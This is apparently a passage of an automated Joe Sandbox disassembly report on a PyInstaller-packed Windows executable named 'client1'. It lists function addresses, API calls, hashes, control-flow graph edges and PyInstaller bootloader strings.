                                                    • API ID: Dealloc$Unicode_$FromInternPlaceSizeString
                                                    • String ID:
                                                    • API String ID: 2745024575-0
                                                    • Opcode ID: 9280ec3cdcc7626997776a9e16dcb55bba6354dcabd47e52aff5645139c6f96c
                                                    • Instruction ID: d3403f8b0bf425239996109e2c451bc87dbef244298a3c8a0a6c4d815c4a1723
                                                    • Opcode Fuzzy Hash: 9280ec3cdcc7626997776a9e16dcb55bba6354dcabd47e52aff5645139c6f96c
                                                    • Instruction Fuzzy Hash: 26519CF5E0BA1281EE579FBAE99417877E4AF48BA0F04C13CCD7E42670DE2DA4648351
                                                    Function 00007FF79F6212B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                    • API String ID: 2030045667-3659356012
                                                    • Opcode ID: b9527ed25a08e027e619c0f48f7f69b51d33915f4b886b1c04b788e0506d998c
                                                    • Instruction ID: 5127a553522058f030d11232e604bcacd8dff4058a98ad03220e3a6ef4e4d023
                                                    • Opcode Fuzzy Hash: b9527ed25a08e027e619c0f48f7f69b51d33915f4b886b1c04b788e0506d998c
                                                    • Instruction Fuzzy Hash: 76416121B0D7C281EE34FB25E8402E9E3AAFB44794FD44431DE6D87A55EE3CE5418311
                                                    Function 00007FF79F621000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 495 7ff79f621000-7ff79f623686 call 7ff79f62f080 call 7ff79f62f078 call 7ff79f627600 call 7ff79f62f078 call 7ff79f62adb0 call 7ff79f634270 call 7ff79f634f14 call 7ff79f621af0 513 7ff79f62379a 495->513 514 7ff79f62368c-7ff79f62369b call 7ff79f623ba0 495->514 515 7ff79f62379f-7ff79f6237bf call 7ff79f62ad80 513->515 514->513 520 7ff79f6236a1-7ff79f6236b4 call 7ff79f623a70 514->520 520->513 523 7ff79f6236ba-7ff79f6236cd call 7ff79f623b20 520->523 523->513 526 7ff79f6236d3-7ff79f6236fa call 7ff79f626990 523->526 529 7ff79f62373c-7ff79f623764 call 7ff79f626f90 call 7ff79f6219d0 526->529 530 7ff79f6236fc-7ff79f62370b call 7ff79f626990 526->530 540 7ff79f62376a-7ff79f623780 call 7ff79f6219d0 529->540 541 7ff79f62384d-7ff79f62385e 529->541 530->529 536 7ff79f62370d-7ff79f623713 530->536 538 7ff79f62371f-7ff79f623739 call 7ff79f63409c call 7ff79f626f90 536->538 539 7ff79f623715-7ff79f62371d 536->539 538->529 539->538 553 7ff79f6237c0-7ff79f6237c3 540->553 554 7ff79f623782-7ff79f623795 call 7ff79f622770 540->554 545 7ff79f623860-7ff79f62386a call 7ff79f623280 541->545 546 7ff79f623873-7ff79f62388b call 7ff79f627a30 541->546 556 7ff79f62386c 545->556 557 7ff79f6238ab-7ff79f6238b8 call 7ff79f625e40 545->557 558 7ff79f62389e-7ff79f6238a5 SetDllDirectoryW 546->558 559 7ff79f62388d-7ff79f623899 call 7ff79f622770 546->559 553->541 561 7ff79f6237c9-7ff79f6237e0 call 7ff79f623cb0 553->561 554->513 556->546 570 7ff79f6238ba-7ff79f6238ca call 7ff79f625ae0 557->570 571 7ff79f623906-7ff79f62390b call 7ff79f625dc0 557->571 558->557 559->513 568 7ff79f6237e7-7ff79f623813 call 7ff79f627200 561->568 569 7ff79f6237e2-7ff79f6237e5 561->569 580 7ff79f62383d-7ff79f62384b 568->580 581 7ff79f623815-7ff79f62381d call 7ff79f62f2ac 568->581 572 7ff79f623822-7ff79f623838 call 7ff79f622770 569->572 570->571 585 7ff79f6238cc-7ff79f6238db call 7ff79f625640 570->585 578 7ff79f623910-7ff79f623913 571->578 572->513 583 7ff79f623919-7ff79f623926 578->583 584 7ff79f6239c6-7ff79f6239ce call 7ff79f623110 578->584 580->545 581->572 589 7ff79f623930-7ff79f62393a 583->589 591 7ff79f6239d3-7ff79f6239d5 584->591 597 7ff79f6238fc-7ff79f623901 call 7ff79f625890 585->597 598 7ff79f6238dd-7ff79f6238e9 call 7ff79f6255d0 585->598 593 7ff79f62393c-7ff79f623941 589->593 594 7ff79f623943-7ff79f623945 589->594 591->513 599 7ff79f6239db-7ff79f623a12 call 7ff79f626f20 call 7ff79f626990 call 7ff79f6253e0 591->599 593->589 593->594 595 7ff79f623947-7ff79f62396a call 7ff79f621b30 594->595 596 7ff79f623991-7ff79f62399c call 7ff79f623270 call 7ff79f6230b0 594->596 595->513 609 7ff79f623970-7ff79f62397b 595->609 616 7ff79f6239a1-7ff79f6239c1 call 7ff79f623260 call 7ff79f625890 call 7ff79f625dc0 596->616 597->571 598->597 610 7ff79f6238eb-7ff79f6238fa call 7ff79f625c90 598->610 599->513 622 7ff79f623a18-7ff79f623a4d call 7ff79f623270 call 7ff79f626fd0 call 7ff79f625890 call 7ff79f625dc0 599->622 613 7ff79f623980-7ff79f62398f 609->613 610->578 613->596 613->613 616->515 635 7ff79f623a57-7ff79f623a61 call 7ff79f621ab0 622->635 636 7ff79f623a4f-7ff79f623a52 call 7ff79f626c90 622->636 635->515 636->635
                                                    APIs
                                                      • Part of subcall function 00007FF79F623BA0: GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                    • SetDllDirectoryW.KERNEL32 ref: 00007FF79F6238A5
                                                      • Part of subcall function 00007FF79F626990: GetEnvironmentVariableW.KERNEL32(00007FF79F6236E7), ref: 00007FF79F6269CA
                                                      • Part of subcall function 00007FF79F626990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79F6269E7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                    • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                    • API String ID: 2344891160-3602715111
                                                    • Opcode ID: a9d80687edf50720008c1c19d3c188cb07f31f297c6ec28e510237156a3f44f3
                                                    • Instruction ID: 9378a5468035c64dedb7c7cf3ca2fb4a3c8269c726e826f7cfe078daac12dbd0
                                                    • Opcode Fuzzy Hash: a9d80687edf50720008c1c19d3c188cb07f31f297c6ec28e510237156a3f44f3
                                                    • Instruction Fuzzy Hash: 57B1B121A1D7C351FE30BB319D522FDA25ABF44794FC04139EA6D87696EF2CE5048722
                                                    Function 00007FF79F621050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 640 7ff79f621050-7ff79f6210ab call 7ff79f62a610 643 7ff79f6210ad-7ff79f6210d2 call 7ff79f622770 640->643 644 7ff79f6210d3-7ff79f6210eb call 7ff79f6340b0 640->644 649 7ff79f621109-7ff79f621119 call 7ff79f6340b0 644->649 650 7ff79f6210ed-7ff79f621104 call 7ff79f6224d0 644->650 655 7ff79f621137-7ff79f621147 649->655 656 7ff79f62111b-7ff79f621132 call 7ff79f6224d0 649->656 657 7ff79f62126c-7ff79f6212a0 call 7ff79f62a2f0 call 7ff79f63409c * 2 650->657 659 7ff79f621150-7ff79f621175 call 7ff79f62f5fc 655->659 656->657 666 7ff79f62117b-7ff79f621185 call 7ff79f62f370 659->666 667 7ff79f62125e 659->667 666->667 674 7ff79f62118b-7ff79f621197 666->674 669 7ff79f621264 667->669 669->657 675 7ff79f6211a0-7ff79f6211c8 call 7ff79f628a60 674->675 678 7ff79f6211ca-7ff79f6211cd 675->678 679 7ff79f621241-7ff79f62125c call 7ff79f622770 675->679 681 7ff79f62123c 678->681 682 7ff79f6211cf-7ff79f6211d9 678->682 679->669 681->679 683 7ff79f6211db-7ff79f6211e8 call 7ff79f62fd3c 682->683 684 7ff79f621203-7ff79f621206 682->684 689 7ff79f6211ed-7ff79f6211f0 683->689 687 7ff79f621208-7ff79f621216 call 7ff79f62bb60 684->687 688 7ff79f621219-7ff79f62121e 684->688 687->688 688->675 691 7ff79f621220-7ff79f621223 688->691 692 7ff79f6211fe-7ff79f621201 689->692 693 7ff79f6211f2-7ff79f6211fc call 7ff79f62f370 689->693 695 7ff79f621237-7ff79f62123a 691->695 696 7ff79f621225-7ff79f621228 691->696 692->679 693->688 693->692 695->669 696->679 698 7ff79f62122a-7ff79f621232 696->698 698->659
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                    • API String ID: 2030045667-1655038675
                                                    • Opcode ID: 3a29cac6c315e89fd1a339ce373b4b8305977fdf4dc839f12d0ce977f9400e5b
                                                    • Instruction ID: 2b31e093f5533dd89edb20ea74b162bd156f727efe36cfc882a4b9eebf5bb82e
                                                    • Opcode Fuzzy Hash: 3a29cac6c315e89fd1a339ce373b4b8305977fdf4dc839f12d0ce977f9400e5b
                                                    • Instruction Fuzzy Hash: DA51A022A0D7C285EA30BB61A8403FAA29AFB85794F844135EE6D87785EF3CE545C711
                                                    Function 00007FF79F63AF2C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 700 7ff79f63af2c-7ff79f63af52 701 7ff79f63af6d-7ff79f63af71 700->701 702 7ff79f63af54-7ff79f63af68 call 7ff79f634424 call 7ff79f634444 700->702 704 7ff79f63b347-7ff79f63b353 call 7ff79f634424 call 7ff79f634444 701->704 705 7ff79f63af77-7ff79f63af7e 701->705 718 7ff79f63b35e 702->718 721 7ff79f63b359 call 7ff79f639db0 704->721 705->704 707 7ff79f63af84-7ff79f63afb2 705->707 707->704 710 7ff79f63afb8-7ff79f63afbf 707->710 713 7ff79f63afd8-7ff79f63afdb 710->713 714 7ff79f63afc1-7ff79f63afd3 call 7ff79f634424 call 7ff79f634444 710->714 716 7ff79f63afe1-7ff79f63afe7 713->716 717 7ff79f63b343-7ff79f63b345 713->717 714->721 716->717 723 7ff79f63afed-7ff79f63aff0 716->723 722 7ff79f63b361-7ff79f63b378 717->722 718->722 721->718 723->714 727 7ff79f63aff2-7ff79f63b017 723->727 729 7ff79f63b04a-7ff79f63b051 727->729 730 7ff79f63b019-7ff79f63b01b 727->730 731 7ff79f63b026-7ff79f63b03d call 7ff79f634424 call 7ff79f634444 call 7ff79f639db0 729->731 732 7ff79f63b053-7ff79f63b05f call 7ff79f63cacc 729->732 733 7ff79f63b01d-7ff79f63b024 730->733 734 7ff79f63b042-7ff79f63b048 730->734 766 7ff79f63b1d0 731->766 740 7ff79f63b064-7ff79f63b07b call 7ff79f639e18 * 2 732->740 733->731 733->734 735 7ff79f63b0c8-7ff79f63b0df 734->735 738 7ff79f63b15a-7ff79f63b164 call 7ff79f642a3c 735->738 739 7ff79f63b0e1-7ff79f63b0e9 735->739 752 7ff79f63b16a-7ff79f63b17f 738->752 753 7ff79f63b1ee 738->753 739->738 742 7ff79f63b0eb-7ff79f63b0ed 739->742 761 7ff79f63b098-7ff79f63b0c3 call 7ff79f63b754 740->761 762 7ff79f63b07d-7ff79f63b093 call 7ff79f634444 call 7ff79f634424 740->762 742->738 746 7ff79f63b0ef-7ff79f63b105 742->746 746->738 750 7ff79f63b107-7ff79f63b113 746->750 750->738 755 7ff79f63b115-7ff79f63b117 750->755 752->753 758 7ff79f63b181-7ff79f63b193 GetConsoleMode 752->758 757 7ff79f63b1f3-7ff79f63b213 ReadFile 753->757 755->738 760 7ff79f63b119-7ff79f63b131 755->760 763 7ff79f63b219-7ff79f63b221 757->763 764 7ff79f63b30d-7ff79f63b316 GetLastError 757->764 758->753 765 7ff79f63b195-7ff79f63b19d 758->765 760->738 771 7ff79f63b133-7ff79f63b13f 760->771 761->735 762->766 763->764 773 7ff79f63b227 763->773 768 7ff79f63b318-7ff79f63b32e call 7ff79f634444 call 7ff79f634424 764->768 769 7ff79f63b333-7ff79f63b336 764->769 765->757 767 7ff79f63b19f-7ff79f63b1c1 ReadConsoleW 765->767 770 7ff79f63b1d3-7ff79f63b1dd call 7ff79f639e18 766->770 775 7ff79f63b1e2-7ff79f63b1ec 767->775 776 7ff79f63b1c3 GetLastError 767->776 768->766 780 7ff79f63b1c9-7ff79f63b1cb call 7ff79f6343b8 769->780 781 7ff79f63b33c-7ff79f63b33e 769->781 770->722 771->738 779 7ff79f63b141-7ff79f63b143 771->779 783 7ff79f63b22e-7ff79f63b243 773->783 775->783 776->780 779->738 788 7ff79f63b145-7ff79f63b155 779->788 780->766 781->770 783->770 790 7ff79f63b245-7ff79f63b250 783->790 788->738 793 7ff79f63b277-7ff79f63b27f 790->793 794 7ff79f63b252-7ff79f63b26b call 7ff79f63ab44 790->794 796 7ff79f63b2fb-7ff79f63b308 call 7ff79f63a984 793->796 797 7ff79f63b281-7ff79f63b293 793->797 800 7ff79f63b270-7ff79f63b272 794->800 796->800 801 7ff79f63b2ee-7ff79f63b2f6 797->801 802 7ff79f63b295 797->802 800->770 801->770 804 7ff79f63b29a-7ff79f63b2a1 802->804 805 7ff79f63b2dd-7ff79f63b2e8 804->805 806 7ff79f63b2a3-7ff79f63b2a7 804->806 805->801 807 7ff79f63b2a9-7ff79f63b2b0 806->807 808 7ff79f63b2c3 806->808 807->808 809 7ff79f63b2b2-7ff79f63b2b6 807->809 810 7ff79f63b2c9-7ff79f63b2d9 808->810 809->808 811 7ff79f63b2b8-7ff79f63b2c1 809->811 810->804 812 7ff79f63b2db 810->812 811->810 812->801
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 6f2067f9e2b798d7e4aa60285487f192dd8020c4dcad372bd04a148e1f9d7242
                                                    • Instruction ID: c801ba19517fe8c095bfee1e2afcf681606a9116e899a8ae86aa424cf4ace6f0
                                                    • Opcode Fuzzy Hash: 6f2067f9e2b798d7e4aa60285487f192dd8020c4dcad372bd04a148e1f9d7242
                                                    • Instruction Fuzzy Hash: 45C1C52290C7C691EA70BB35A4402FDE7AAEFC1B84F950135E96D03796CEBDE8458720
                                                    Function 00007FF79F62B19C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 1452418845-0
                                                    • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction ID: 7bfa76644cef631d3ae45f44de4443e65a40bd1892020e5672e118848bef1773
                                                    • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                    • Instruction Fuzzy Hash: 73311321E097C345FA74BB7499513FDA29BEF91384FC44034E92E8B2D7DE6CA8058272
                                                    Function 00007FF79F634680 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 1279662727-0
                                                    • Opcode ID: 8a464286a4aee93ad09e46d96520f5fa22b2a313ca22bba1db5411dbdbef7e96
                                                    • Instruction ID: 3c025c4dba6c9d4953071937d259e383a1883ee57a742f34534be38f6efcc3b2
                                                    • Opcode Fuzzy Hash: 8a464286a4aee93ad09e46d96520f5fa22b2a313ca22bba1db5411dbdbef7e96
                                                    • Instruction Fuzzy Hash: 24419523D187C183FB64AF3195503B9E265FB957A4F609334E66C03AD6DFACA5E08710
                                                    Function 00007FF79F62F39C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 969 7ff79f62f39c-7ff79f62f3c9 970 7ff79f62f3cb-7ff79f62f3ce 969->970 971 7ff79f62f3e5 969->971 970->971 973 7ff79f62f3d0-7ff79f62f3d3 970->973 972 7ff79f62f3e7-7ff79f62f3fb 971->972 974 7ff79f62f3fc-7ff79f62f3ff 973->974 975 7ff79f62f3d5-7ff79f62f3da call 7ff79f634444 973->975 976 7ff79f62f401-7ff79f62f40d 974->976 977 7ff79f62f40f-7ff79f62f413 974->977 987 7ff79f62f3e0 call 7ff79f639db0 975->987 976->977 979 7ff79f62f43a-7ff79f62f443 976->979 980 7ff79f62f427-7ff79f62f42a 977->980 981 7ff79f62f415-7ff79f62f41f call 7ff79f62c210 977->981 985 7ff79f62f44a 979->985 986 7ff79f62f445-7ff79f62f448 979->986 980->975 984 7ff79f62f42c-7ff79f62f438 980->984 981->980 984->975 984->979 990 7ff79f62f44f-7ff79f62f46e 985->990 986->990 987->971 991 7ff79f62f5b5-7ff79f62f5b8 990->991 992 7ff79f62f474-7ff79f62f482 990->992 991->972 993 7ff79f62f4fa-7ff79f62f4ff 992->993 994 7ff79f62f484-7ff79f62f48b 992->994 996 7ff79f62f56c-7ff79f62f56f call 7ff79f63b37c 993->996 997 7ff79f62f501-7ff79f62f50d 993->997 994->993 995 7ff79f62f48d 994->995 998 7ff79f62f5e0 995->998 999 7ff79f62f493-7ff79f62f49d 995->999 1007 7ff79f62f574-7ff79f62f577 996->1007 1000 7ff79f62f519-7ff79f62f51f 997->1000 1001 7ff79f62f50f-7ff79f62f516 997->1001 1006 7ff79f62f5e5-7ff79f62f5f0 998->1006 1003 7ff79f62f5bd-7ff79f62f5c1 999->1003 1004 7ff79f62f4a3-7ff79f62f4a9 999->1004 1000->1003 1005 7ff79f62f525-7ff79f62f542 call 7ff79f639184 call 7ff79f63af2c 1000->1005 1001->1000 1010 7ff79f62f5d0-7ff79f62f5db call 7ff79f634444 1003->1010 1011 7ff79f62f5c3-7ff79f62f5cb call 7ff79f62c210 1003->1011 1008 7ff79f62f4ab-7ff79f62f4ae 1004->1008 1009 7ff79f62f4e1-7ff79f62f4f5 1004->1009 1028 7ff79f62f547-7ff79f62f549 1005->1028 1006->972 1007->1006 1013 7ff79f62f579-7ff79f62f57c 1007->1013 1016 7ff79f62f4cc-7ff79f62f4d7 call 7ff79f634444 call 7ff79f639db0 1008->1016 1017 7ff79f62f4b0-7ff79f62f4b6 1008->1017 1015 7ff79f62f59c-7ff79f62f5a7 1009->1015 1010->987 1011->1010 1013->1003 1014 7ff79f62f57e-7ff79f62f595 1013->1014 1014->1015 1015->992 1021 7ff79f62f5ad 1015->1021 1035 7ff79f62f4dc 1016->1035 1022 7ff79f62f4b8-7ff79f62f4c0 call 7ff79f62bb60 1017->1022 1023 7ff79f62f4c2-7ff79f62f4c7 call 7ff79f62c210 1017->1023 1021->991 1022->1035 1023->1016 1032 7ff79f62f54f 1028->1032 1033 7ff79f62f5f5-7ff79f62f5fa 1028->1033 1032->998 1036 7ff79f62f555-7ff79f62f56a 1032->1036 1033->1006 1035->1009 1036->1015
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction ID: b1739a37f4992f6b746848c27ac7417057e0e1e55ffde008eb368e8f11f59d45
                                                    • Opcode Fuzzy Hash: bd665411d6c8cb657e02e9163d495b47fe1eb31481a6a537198dee777c004d3e
                                                    • Instruction Fuzzy Hash: D051EA61B193C245EA78AE3998006FAE19AAF44BB4F944734DD7D877CACF7CD4018722
                                                    Function 00007FF79F63B604 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B650
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF79F63B79D), ref: 00007FF79F63B65A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction ID: 5f155c4b525449dfabc16d6bc686e936b05c9d6be56a2bcf0d31afdc90bb181e
                                                    • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                    • Instruction Fuzzy Hash: 3011B262B18BD181DA20AB35B4441A9E766AB85BF4F944331EA7D477E9CF7CD0118700
                                                    Function 00007FF79F63A028 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A096
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F639EA5,?,?,00000000,00007FF79F639F5A), ref: 00007FF79F63A0A0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
